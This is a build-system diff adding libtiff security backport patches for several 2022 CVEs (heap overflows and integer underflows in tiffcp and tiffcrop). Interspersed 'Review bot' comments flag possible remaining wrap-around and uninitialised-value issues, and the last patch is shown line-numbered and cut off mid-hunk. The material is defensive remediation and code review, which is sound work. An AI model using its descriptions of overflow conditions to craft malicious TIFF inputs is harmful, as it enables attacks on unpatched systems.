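+Date: Thu, 10 Mar 2022 08:48:00 +0000
+Subject: [PATCH] fix heap buffer overflow in tiffcp (#278)
+
+CVE: CVE-2022-0924
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0924.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ tools/tiffcp.c | 17 ++++++++++++++++-
+ 1 file changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 224583e0..aa32b118 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -1524,12 +1524,27 @@ DECLAREwriteFunc(writeBufferToSeparateSt
+ tdata_t obuf;
+ tstrip_t strip = 0;
+ tsample_t s;
++ uint16 bps = 0, bytes_per_sample;
+
+ obuf = _TIFFmalloc(stripsize);
+ if (obuf == NULL)
+ return (0);
+ _TIFFmemset(obuf, 0, stripsize);
+ (void) TIFFGetFieldDefaulted(out, TIFFTAG_ROWSPERSTRIP, &rowsperstrip);
++ (void) TIFFGetField(out, TIFFTAG_BITSPERSAMPLE, &bps);
++ if( bps == 0 )
++ {
++ TIFFError(TIFFFileName(out), "Error, cannot read BitsPerSample");
++ _TIFFfree(obuf);
++ return 0;
++ }
++ if( (bps % 8) != 0 )
++ {
++ TIFFError(TIFFFileName(out), "Error, cannot handle BitsPerSample that is not a multiple of 8");
++ _TIFFfree(obuf);
++ return 0;
++ }
++ bytes_per_sample = bps/8;
+ for (s = 0; s < spp; s++) {
+ uint32 row;
+ for (row = 0; row < imagelength; row += rowsperstrip) {
+@@ -1539,7 +1539,7 @@ DECLAREwriteFunc(writeBufferToSeparateSt
+
+ cpContigBufToSeparateBuf(
+ obuf, (uint8*) buf + row*rowsize + s,
+- nrows, imagewidth, 0, 0, spp, 1);
++ nrows, imagewidth, 0, 0, spp, bytes_per_sample);
+ if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0) {
+ TIFFError(TIFFFileName(out),
+ "Error, can't write strip %u",
+--
+GitLab
+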
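Review bot: In the second hunk the per-sample width passed to `cpContigBufToSeparateBuf` becomes `bytes_per_sample`, but the source pointer on the line above is still `(uint8*) buf + row*rowsize + s`, which advances one byte per sample index rather than one whole sample. For 16- or 32-bit data that looks like it starts sample `s` part-way through an earlier sample; if `cpContigBufToSeparateBuf` (not shown) expects a pointer to the first byte of the selected sample, the line should read `obuf, (uint8*) buf + row*rowsize + s*bytes_per_sample,`. The backport is marked "No change in any hunk", so this is worth checking against current upstream rather than patching locally. The function body continues outside both hunks.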
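diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
new file mode 100644
index 0000000000..01e81349a2
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
@@ -0,0 +1,183 @@
+From 8261237113a53cd21029c4a8cbb62c47b4c19523 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 27 Jul 2022 11:30:18 +0530
+Subject: [PATCH] CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/dd1bcc7abb26094e93636e85520f0d8f81ab0fab]
+CVE: CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_aux.c | 9 +++++++
+ libtiff/tiffiop.h | 1 +
+ tools/tiffcrop.c | 62 ++++++++++++++++++++++++++---------------------
+ 3 files changed, 44 insertions(+), 28 deletions(-)
+
+diff --git a/libtiff/tif_aux.c b/libtiff/tif_aux.c
+index 8188db5..3dac542 100644
+--- a/libtiff/tif_aux.c
++++ b/libtiff/tif_aux.c
+@@ -402,6 +402,15 @@ float _TIFFClampDoubleToFloat( double val )
+ return (float)val;
+ }
+
++uint32 _TIFFClampDoubleToUInt32(double val)
++{
++ if( val < 0 )
++ return 0;
++ if( val > 0xFFFFFFFFU || val != val )
++ return 0xFFFFFFFFU;
++ return (uint32)val;
++}
++
+ int _TIFFSeekOK(TIFF* tif, toff_t off)
+ {
+ /* Huge offsets, especially -1 / UINT64_MAX, can cause issues */
+diff --git a/libtiff/tiffiop.h b/libtiff/tiffiop.h
+index 45a7932..c6f6f93 100644
+--- a/libtiff/tiffiop.h
++++ b/libtiff/tiffiop.h
+@@ -393,6 +393,7 @@ extern double _TIFFUInt64ToDouble(uint64);
+ extern float _TIFFUInt64ToFloat(uint64);
+
+ extern float _TIFFClampDoubleToFloat(double);
++extern uint32 _TIFFClampDoubleToUInt32(double);
+
+ extern tmsize_t
+ _TIFFReadEncodedStripAndAllocBuffer(TIFF* tif, uint32 strip,
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c2c2052..79dd0a0 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5141,17 +5141,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ {
+ if ((crop->res_unit == RESUNIT_INCH) || (crop->res_unit == RESUNIT_CENTIMETER))
+ {
+- x1 = (uint32) (crop->corners[i].X1 * scale * xres);
+- x2 = (uint32) (crop->corners[i].X2 * scale * xres);
+- y1 = (uint32) (crop->corners[i].Y1 * scale * yres);
+- y2 = (uint32) (crop->corners[i].Y2 * scale * yres);
++ x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1 * scale * xres);
++ x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2 * scale * xres);
++ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1 * scale * yres);
++ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2 * scale * yres);
+ }
+ else
+ {
+- x1 = (uint32) (crop->corners[i].X1);
+- x2 = (uint32) (crop->corners[i].X2);
+- y1 = (uint32) (crop->corners[i].Y1);
+- y2 = (uint32) (crop->corners[i].Y2);
++ x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1);
++ x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2);
++ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
++ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
+ }
+ if (x1 < 1)
+ crop->regionlist[i].x1 = 0;
+@@ -5214,17 +5214,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ {
+ if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
+ { /* User has specified pixels as reference unit */
+- tmargin = (uint32)(crop->margins[0]);
+- lmargin = (uint32)(crop->margins[1]);
+- bmargin = (uint32)(crop->margins[2]);
+- rmargin = (uint32)(crop->margins[3]);
++ tmargin = _TIFFClampDoubleToUInt32(crop->margins[0]);
++ lmargin = _TIFFClampDoubleToUInt32(crop->margins[1]);
++ bmargin = _TIFFClampDoubleToUInt32(crop->margins[2]);
++ rmargin = _TIFFClampDoubleToUInt32(crop->margins[3]);
+ }
+ else
+ { /* inches or centimeters specified */
+- tmargin = (uint32)(crop->margins[0] * scale * yres);
+- lmargin = (uint32)(crop->margins[1] * scale * xres);
+- bmargin = (uint32)(crop->margins[2] * scale * yres);
+- rmargin = (uint32)(crop->margins[3] * scale * xres);
++ tmargin = _TIFFClampDoubleToUInt32(crop->margins[0] * scale * yres);
++ lmargin = _TIFFClampDoubleToUInt32(crop->margins[1] * scale * xres);
++ bmargin = _TIFFClampDoubleToUInt32(crop->margins[2] * scale * yres);
++ rmargin = _TIFFClampDoubleToUInt32(crop->margins[3] * scale * xres);
+ }
+
+ if ((lmargin + rmargin) > image->width)
+@@ -5254,24 +5254,24 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
+ {
+ if (crop->crop_mode & CROP_WIDTH)
+- width = (uint32)crop->width;
++ width = _TIFFClampDoubleToUInt32(crop->width);
+ else
+ width = image->width - lmargin - rmargin;
+
+ if (crop->crop_mode & CROP_LENGTH)
+- length = (uint32)crop->length;
++ length = _TIFFClampDoubleToUInt32(crop->length);
+ else
+ length = image->length - tmargin - bmargin;
+ }
+ else
+ {
+ if (crop->crop_mode & CROP_WIDTH)
+- width = (uint32)(crop->width * scale * image->xres);
++ width = _TIFFClampDoubleToUInt32(crop->width * scale * image->xres);
+ else
+ width = image->width - lmargin - rmargin;
+
+ if (crop->crop_mode & CROP_LENGTH)
+- length = (uint32)(crop->length * scale * image->yres);
++ length = _TIFFClampDoubleToUInt32(crop->length * scale * image->yres);
+ else
+ length = image->length - tmargin - bmargin;
+ }
+@@ -5670,13 +5670,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ {
+ if (page->res_unit == RESUNIT_INCH || page->res_unit == RESUNIT_CENTIMETER)
+ { /* inches or centimeters specified */
+- hmargin = (uint32)(page->hmargin * scale * page->hres * ((image->bps + 7)/ 8));
+- vmargin = (uint32)(page->vmargin * scale * page->vres * ((image->bps + 7)/ 8));
++ hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * page->hres * ((image->bps + 7) / 8));
++ vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * page->vres * ((image->bps + 7) / 8));
+ }
+ else
+ { /* Otherwise user has specified pixels as reference unit */
+- hmargin = (uint32)(page->hmargin * scale * ((image->bps + 7)/ 8));
+- vmargin = (uint32)(page->vmargin * scale * ((image->bps + 7)/ 8));
++ hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * ((image->bps + 7) / 8));
++ vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * ((image->bps + 7) / 8));
+ }
+
+ if ((hmargin * 2.0) > (pwidth * page->hres))
+@@ -5714,13 +5714,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ {
+ if (page->mode & PAGE_MODE_PAPERSIZE )
+ {
+- owidth = (uint32)((pwidth * page->hres) - (hmargin * 2));
+- olength = (uint32)((plength * page->vres) - (vmargin * 2));
++ owidth = _TIFFClampDoubleToUInt32((pwidth * page->hres) - (hmargin * 2));
++ olength = _TIFFClampDoubleToUInt32((plength * page->vres) - (vmargin * 2));
+ }
+ else
+ {
+- owidth = (uint32)(iwidth - (hmargin * 2 * page->hres));
+- olength = (uint32)(ilength - (vmargin * 2 * page->vres));
++ owidth = _TIFFClampDoubleToUInt32(iwidth - (hmargin * 2 * page->hres));
++ olength = _TIFFClampDoubleToUInt32(ilength - (vmargin * 2 * page->vres));
+ }
+ }
+
+@@ -5729,6 +5729,12 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ if (olength > ilength)
+ olength = ilength;
+
++ if (owidth == 0 || olength == 0)
++ {
++ TIFFError("computeOutputPixelOffsets", "Integer overflow when calculating the number of pages");
++ exit(EXIT_FAILURE);
++ }
++
+ /* Compute the number of pages required for Portrait or Landscape */
+ switch (page->orient)
+ {
+--
+2.25.1
+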
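Review bot: The clamp in computeOutputPixelOffsets protects only the final conversion; the sub-expressions `hmargin * 2` in `_TIFFClampDoubleToUInt32((pwidth * page->hres) - (hmargin * 2))` and in `hmargin * 2 * page->hres` (likewise for `vmargin`) are still evaluated in integer arithmetic before being widened, assuming `hmargin` and `vmargin` are uint32 as their assignment from the clamp suggests. Now that the margins can saturate at 0xFFFFFFFF, that product wraps and the subtraction no longer produces the negative value the clamp is meant to turn into 0. The context line `if ((hmargin * 2.0) > (pwidth * page->hres))` already uses a double constant, and the four new lines should do the same, e.g. `owidth = _TIFFClampDoubleToUInt32((pwidth * page->hres) - (hmargin * 2.0));`. The added `owidth == 0 || olength == 0` branch also reports "Integer overflow" for what may simply be margins larger than the page and calls `exit()` from a helper; whether the function could return an error instead is not visible in the hunk.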
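diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
new file mode 100644
index 0000000000..131ff94119
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
@@ -0,0 +1,159 @@
+From 07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Wed, 9 Feb 2022 21:31:29 +0000
+Subject: [PATCH] tiffcrop.c: Fix issue #352 heap-buffer-overflow by correcting
+ uint32_t underflow.
+
+CVE: CVE-2022-2867 CVE-2022-2868 CVE-2022-2869
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+Index: tiff-4.1.0/tools/tiffcrop.c
+===================================================================
+--- tiff-4.1.0.orig/tools/tiffcrop.c
++++ tiff-4.1.0/tools/tiffcrop.c
+@@ -5153,29 +5153,45 @@ computeInputPixelOffsets(struct crop_mas
+ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
+ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
+ }
+- if (x1 < 1)
+- crop->regionlist[i].x1 = 0;
+- else
+- crop->regionlist[i].x1 = (uint32) (x1 - 1);
++ /* a) Region needs to be within image sizes 0.. width-1; 0..length-1
++ * b) Corners are expected to be submitted as top-left to bottom-right.
++ * Therefore, check that and reorder input.
++ * (be aware x,y are already casted to (uint32_t) and avoid (0 - 1) )
++ */
++ uint32_t aux;
++ if (x1 > x2) {
++ aux = x1;
++ x1 = x2;
++ x2 = aux;
++ }
++ if (y1 > y2) {
++ aux = y1;
++ y1 = y2;
++ y2 = aux;
++ }
++ if (x1 > image->width - 1)
++ crop->regionlist[i].x1 = image->width - 1;
++ else if (x1 > 0)
++ crop->regionlist[i].x1 = (uint32_t)(x1 - 1);
+
+ if (x2 > image->width - 1)
+ crop->regionlist[i].x2 = image->width - 1;
+- else
+- crop->regionlist[i].x2 = (uint32) (x2 - 1);
+- zwidth = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
+-
+- if (y1 < 1)
+- crop->regionlist[i].y1 = 0;
+- else
+- crop->regionlist[i].y1 = (uint32) (y1 - 1);
++ else if (x2 > 0)
++ crop->regionlist[i].x2 = (uint32_t)(x2 - 1);
++
++ zwidth = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
++
++ if (y1 > image->length - 1)
++ crop->regionlist[i].y1 = image->length - 1;
++ else if (y1 > 0)
++ crop->regionlist[i].y1 = (uint32_t)(y1 - 1);
+
+ if (y2 > image->length - 1)
+ crop->regionlist[i].y2 = image->length - 1;
+- else
+- crop->regionlist[i].y2 = (uint32) (y2 - 1);
+-
+- zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
++ else if (y2 > 0)
++ crop->regionlist[i].y2 = (uint32_t)(y2 - 1);
+
++ zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
+ if (zwidth > max_width)
+ max_width = zwidth;
+ if (zlength > max_length)
+@@ -5205,7 +5221,7 @@ computeInputPixelOffsets(struct crop_mas
+ }
+ }
+ return (0);
+- }
++ } /* crop_mode == CROP_REGIONS */
+
+ /* Convert crop margins into offsets into image
+ * Margins are expressed as pixel rows and columns, not bytes
+@@ -5241,7 +5257,7 @@ computeInputPixelOffsets(struct crop_mas
+ bmargin = (uint32) 0;
+ return (-1);
+ }
+- }
++ } /* crop_mode == CROP_MARGINS */
+ else
+ { /* no margins requested */
+ tmargin = (uint32) 0;
+@@ -5332,24 +5348,23 @@ computeInputPixelOffsets(struct crop_mas
+ off->endx = endx;
+ off->endy = endy;
+
+- crop_width = endx - startx + 1;
+- crop_length = endy - starty + 1;
+-
+- if (crop_width <= 0)
++ if (endx + 1 <= startx)
+ {
+ TIFFError("computeInputPixelOffsets",
+ "Invalid left/right margins and /or image crop width requested");
+ return (-1);
+ }
++ crop_width = endx - startx + 1;
+ if (crop_width > image->width)
+ crop_width = image->width;
+
+- if (crop_length <= 0)
++ if (endy + 1 <= starty)
+ {
+ TIFFError("computeInputPixelOffsets",
+ "Invalid top/bottom margins and /or image crop length requested");
+ return (-1);
+ }
++ crop_length = endy - starty + 1;
+ if (crop_length > image->length)
+ crop_length = image->length;
+
+@@ -5449,10 +5464,17 @@ getCropOffsets(struct image_data *image,
+ else
+ crop->selections = crop->zones;
+
+- for (i = 0; i < crop->zones; i++)
++ /* Initialize regions iterator i */
++ i = 0;
++ for (int j = 0; j < crop->zones; j++)
+ {
+- seg = crop->zonelist[i].position;
+- total = crop->zonelist[i].total;
++ seg = crop->zonelist[j].position;
++ total = crop->zonelist[j].total;
++
++ /* check for not allowed zone cases like 0:0; 4:3; etc. and skip that input */
++ if (seg == 0 || total == 0 || seg > total) {
++ continue;
++ }
+
+ switch (crop->edge_ref)
+ {
+@@ -5581,8 +5603,11 @@ getCropOffsets(struct image_data *image,
+ i + 1, (uint32)zwidth, (uint32)zlength,
+ crop->regionlist[i].x1, crop->regionlist[i].x2,
+ crop->regionlist[i].y1, crop->regionlist[i].y2);
++ /* increment regions iterator */
++ i++;
+ }
+-
++ /* set number of generated regions out of given zones */
++ crop->selections = i;
+ return (0);
+ } /* end getCropOffsets */
+
+--
+GitLab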
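Review bot: The rewritten clamping in the first computeInputPixelOffsets hunk drops the unconditional assignment: with `if (x1 > image->width - 1) … else if (x1 > 0) …` nothing is stored in `crop->regionlist[i].x1` when `x1` is 0, where the removed code wrote 0 explicitly. `zwidth` and `zlength` are then computed from whatever the field held before, so the result depends on the region list having been zero-initialised, which is not visible here. Adding a final `else crop->regionlist[i].x1 = 0;` (and the same for `x2`, `y1` and `y2`) gives every path a defined value. `image->width - 1` and `image->length - 1` also wrap when the dimension is 0, so a zero-sized image should be rejected before this block if it is not already. The function starts and ends outside the hunks.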
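diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
new file mode 100644
index 0000000000..cf440ce55f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
@@ -0,0 +1,29 @@
+From 06386cc9dff5dc162006abe11fd4d1a6fad616cc Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 18 Aug 2022 09:40:50 +0530
+Subject: [PATCH] CVE-2022-34526
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/275735d0354e39c0ac1dc3c0db2120d6f31d1990]
+CVE: CVE-2022-34526
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_dirinfo.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
+index 52d53d4..4a1ca00 100644
+--- a/libtiff/tif_dirinfo.c
++++ b/libtiff/tif_dirinfo.c
+@@ -983,6 +983,9 @@ _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag)
+ default:
+ return 1;
+ }
++ if( !TIFFIsCODECConfigured(tif->tif_dir.td_compression) ) {
++ return 0;
++ }
+ /* Check if codec specific tags are allowed for the current
+ * compression scheme (codec) */
+ switch (tif->tif_dir.td_compression) {
+--
+2.25.1
+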
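Review bot: The added early return in _TIFFCheckFieldIsValidForCodec has no comment, and the existing comment just below it ("Check if codec specific tags are allowed for the current compression scheme") describes only the switch that follows. I would add `/* A codec that is not configured in this build cannot vouch for its own tags: reject them. */` above the `TIFFIsCODECConfigured()` test so the ordering is not undone in a later clean-up. The test sits after the first switch's `default: return 1;`, so it appears to be reached only for the tags that switch lists; the list itself is outside the hunk.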
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
new file mode 100644
index 0000000000..760e20dd2b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
@@ -0,0 +1,659 @@
1From 226e336cdceec933da2e9f72b6578c7a1bea450b Mon Sep 17 00:00:00 2001
2From: Su Laus <sulau@freenet.de>
3Date: Thu, 13 Oct 2022 14:33:27 +0000
4Subject: [PATCH] tiffcrop subroutines require a larger buffer (fixes #271,
5
6Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
7CVE: CVE-2022-3570 CVE-2022-3598
8Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
9
10Origin: https://gitlab.com/libtiff/libtiff/-/commit/cfbb883bf6ea7bedcb04177cc4e52d304522fdff
11Origin: https://gitlab.com/libtiff/libtiff/-/commit/24d3b2425af24432e0e4e2fd58b33f3b04c4bfa4
12Reviewed-by: Sylvain Beucler <beuc@debian.org>
13Last-Update: 2023-01-17
14
15 #381, #386, #388, #389, #435)
16
17---
18 tools/tiffcrop.c | 209 ++++++++++++++++++++++++++---------------------
19 1 file changed, 117 insertions(+), 92 deletions(-)
20
21diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
22index c7877aa..c923920 100644
23--- a/tools/tiffcrop.c
24+++ b/tools/tiffcrop.c
25@@ -126,6 +126,7 @@ static char tiffcrop_rev_date[] = "03-03-2010";
26
27 #ifdef HAVE_STDINT_H
28 # include <stdint.h>
29+# include <inttypes.h>
30 #endif
31
32 #ifndef HAVE_GETOPT
33@@ -212,6 +213,10 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
34
35 #define TIFF_DIR_MAX 65534
36
37+/* Some conversion subroutines require image buffers, which are at least 3 bytes
38+ * larger than the necessary size for the image itself. */
39+#define NUM_BUFF_OVERSIZE_BYTES 3
40+
41 /* Offsets into buffer for margins and fixed width and length segments */
42 struct offset {
43 uint32 tmargin;
44@@ -233,7 +238,7 @@ struct offset {
45 */
46
47 struct buffinfo {
48- uint32 size; /* size of this buffer */
49+ size_t size; /* size of this buffer */
50 unsigned char *buffer; /* address of the allocated buffer */
51 };
52
53@@ -771,8 +776,8 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
54 uint32 dst_rowsize, shift_width;
55 uint32 bytes_per_sample, bytes_per_pixel;
56 uint32 trailing_bits, prev_trailing_bits;
57- uint32 tile_rowsize = TIFFTileRowSize(in);
58- uint32 src_offset, dst_offset;
59+ tmsize_t tile_rowsize = TIFFTileRowSize(in);
60+ tmsize_t src_offset, dst_offset;
61 uint32 row_offset, col_offset;
62 uint8 *bufp = (uint8*) buf;
63 unsigned char *src = NULL;
64@@ -822,7 +827,7 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
65 TIFFError("readContigTilesIntoBuffer", "Integer overflow when calculating buffer size.");
66 exit(-1);
67 }
68- tilebuf = _TIFFmalloc(tile_buffsize + 3);
69+ tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
70 if (tilebuf == 0)
71 return 0;
72 tilebuf[tile_buffsize] = 0;
73@@ -986,7 +991,7 @@ static int readSeparateTilesIntoBuffer (TIFF* in, uint8 *obuf,
74 for (sample = 0; (sample < spp) && (sample < MAX_SAMPLES); sample++)
75 {
76 srcbuffs[sample] = NULL;
77- tbuff = (unsigned char *)_TIFFmalloc(tilesize + 8);
78+ tbuff = (unsigned char *)_TIFFmalloc(tilesize + NUM_BUFF_OVERSIZE_BYTES);
79 if (!tbuff)
80 {
81 TIFFError ("readSeparateTilesIntoBuffer",
82@@ -1181,7 +1186,8 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
83 }
84 rowstripsize = rowsperstrip * bytes_per_sample * (width + 1);
85
86- obuf = _TIFFmalloc (rowstripsize);
87+ /* Add 3 padding bytes for extractContigSamples32bits */
88+ obuf = _TIFFmalloc (rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
89 if (obuf == NULL)
90 return 1;
91
92@@ -1194,7 +1200,7 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
93 stripsize = TIFFVStripSize(out, nrows);
94 src = buf + (row * rowsize);
95 total_bytes += stripsize;
96- memset (obuf, '\0', rowstripsize);
97+ memset (obuf, '\0',rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
98 if (extractContigSamplesToBuffer(obuf, src, nrows, width, s, spp, bps, dump))
99 {
100 _TIFFfree(obuf);
101@@ -1202,10 +1208,15 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
102 }
103 if ((dump->outfile != NULL) && (dump->level == 1))
104 {
105- dump_info(dump->outfile, dump->format,"",
106+ if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
107+ dump_info(dump->infile, dump->format, "loadImage",
108+ "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
109+ (uint64_t)scanlinesize);
110+ }
111+ dump_info(dump->outfile, dump->format,"",
112 "Sample %2d, Strip: %2d, bytes: %4d, Row %4d, bytes: %4d, Input offset: %6d",
113- s + 1, strip + 1, stripsize, row + 1, scanlinesize, src - buf);
114- dump_buffer(dump->outfile, dump->format, nrows, scanlinesize, row, obuf);
115+ s + 1, strip + 1, stripsize, row + 1, (uint32)scanlinesize, src - buf);
116+ dump_buffer(dump->outfile, dump->format, nrows, (uint32)scanlinesize, row, obuf);
117 }
118
119 if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0)
120@@ -1232,7 +1243,7 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
121 uint32 tl, tw;
122 uint32 row, col, nrow, ncol;
123 uint32 src_rowsize, col_offset;
124- uint32 tile_rowsize = TIFFTileRowSize(out);
125+ tmsize_t tile_rowsize = TIFFTileRowSize(out);
126 uint8* bufp = (uint8*) buf;
127 tsize_t tile_buffsize = 0;
128 tsize_t tilesize = TIFFTileSize(out);
129@@ -1275,9 +1286,11 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
130 }
131 src_rowsize = ((imagewidth * spp * bps) + 7U) / 8;
132
133- tilebuf = _TIFFmalloc(tile_buffsize);
134+ /* Add 3 padding bytes for extractContigSamples32bits */
135+ tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
136 if (tilebuf == 0)
137 return 1;
138+ memset(tilebuf, 0, tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
139 for (row = 0; row < imagelength; row += tl)
140 {
141 nrow = (row + tl > imagelength) ? imagelength - row : tl;
142@@ -1323,7 +1336,8 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
143 uint32 imagewidth, tsample_t spp,
144 struct dump_opts * dump)
145 {
146- tdata_t obuf = _TIFFmalloc(TIFFTileSize(out));
147+ /* Add 3 padding bytes for extractContigSamples32bits */
148+ tdata_t obuf = _TIFFmalloc(TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
149 uint32 tl, tw;
150 uint32 row, col, nrow, ncol;
151 uint32 src_rowsize, col_offset;
152@@ -1333,6 +1347,7 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
153
154 if (obuf == NULL)
155 return 1;
156+ memset(obuf, 0, TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
157
158 TIFFGetField(out, TIFFTAG_TILELENGTH, &tl);
159 TIFFGetField(out, TIFFTAG_TILEWIDTH, &tw);
160@@ -1754,14 +1769,14 @@ void process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
161
162 *opt_offset = '\0';
163 /* convert option to lowercase */
164- end = strlen (opt_ptr);
165+ end = (unsigned int)strlen (opt_ptr);
166 for (i = 0; i < end; i++)
167 *(opt_ptr + i) = tolower((int) *(opt_ptr + i));
168 /* Look for dump format specification */
169 if (strncmp(opt_ptr, "for", 3) == 0)
170 {
171 /* convert value to lowercase */
172- end = strlen (opt_offset + 1);
173+ end = (unsigned int)strlen (opt_offset + 1);
174 for (i = 1; i <= end; i++)
175 *(opt_offset + i) = tolower((int) *(opt_offset + i));
176 /* check dump format value */
177@@ -2213,6 +2228,8 @@ main(int argc, char* argv[])
178 size_t length;
179 char temp_filename[PATH_MAX + 16]; /* Extra space keeps the compiler from complaining */
180
181+ assert(NUM_BUFF_OVERSIZE_BYTES >= 3);
182+
183 little_endian = *((unsigned char *)&little_endian) & '1';
184
185 initImageData(&image);
186@@ -3114,13 +3131,13 @@ extractContigSamples32bits (uint8 *in, uint8 *out, uint32 cols,
187 /* If we have a full buffer's worth, write it out */
188 if (ready_bits >= 32)
189 {
190- bytebuff1 = (buff2 >> 56);
191+ bytebuff1 = (uint8)(buff2 >> 56);
192 *dst++ = bytebuff1;
193- bytebuff2 = (buff2 >> 48);
194+ bytebuff2 = (uint8)(buff2 >> 48);
195 *dst++ = bytebuff2;
196- bytebuff3 = (buff2 >> 40);
197+ bytebuff3 = (uint8)(buff2 >> 40);
198 *dst++ = bytebuff3;
199- bytebuff4 = (buff2 >> 32);
200+ bytebuff4 = (uint8)(buff2 >> 32);
201 *dst++ = bytebuff4;
202 ready_bits -= 32;
203
204@@ -3495,13 +3512,13 @@ extractContigSamplesShifted32bits (uint8 *in, uint8 *out, uint32 cols,
205 }
206 else /* If we have a full buffer's worth, write it out */
207 {
208- bytebuff1 = (buff2 >> 56);
209+ bytebuff1 = (uint8)(buff2 >> 56);
210 *dst++ = bytebuff1;
211- bytebuff2 = (buff2 >> 48);
